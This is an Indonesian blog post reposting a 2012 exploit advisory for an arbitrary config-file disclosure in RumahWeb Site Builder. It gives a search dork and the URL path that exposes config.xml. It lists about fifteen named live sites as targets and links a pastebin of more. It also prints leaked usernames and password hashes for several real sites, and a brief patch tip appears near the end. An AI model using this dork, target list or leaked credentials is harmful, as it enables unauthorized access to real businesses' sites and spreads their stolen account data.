intext:sitebuilder rumahweb | Girilaya Real Groups

Posted by Unknown 1 komentar
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb

Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml

-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml


Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e

Sumber : http://go.girilaya.com/0l0qwm
Twisted Evil

Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/

<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>

bagi teman2 yang sudah terlanjur memakai SITEBUILDer tersebut . .. jangan kwatir dan jangan underestimate dulu. . . ita juga bisa PATCHing koq... dengan menghapus Template dan menghapus template.xml yang ada di /data/config/template.xml.

contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
Spoiler:



<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>

<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>

TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: intext:sitebuilder rumahweb | Girilaya Real Groups
Ditulis oleh Unknown
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://aljihad99.blogspot.com/2012/12/intextsitebuilder-rumahweb-girilaya.html. Terima kasih sudah singgah membaca artikel ini.

1 komentar:

Web Hosting Murah mengatakan...

Mantap mas iformasinya, semoga makin maju blog ini.

Posting Komentar

silahkan tinggalkan komentar anda

Template by Berita Update - Trik SEO Terbaru. Original design by Bamz | Copyright of W-Rock.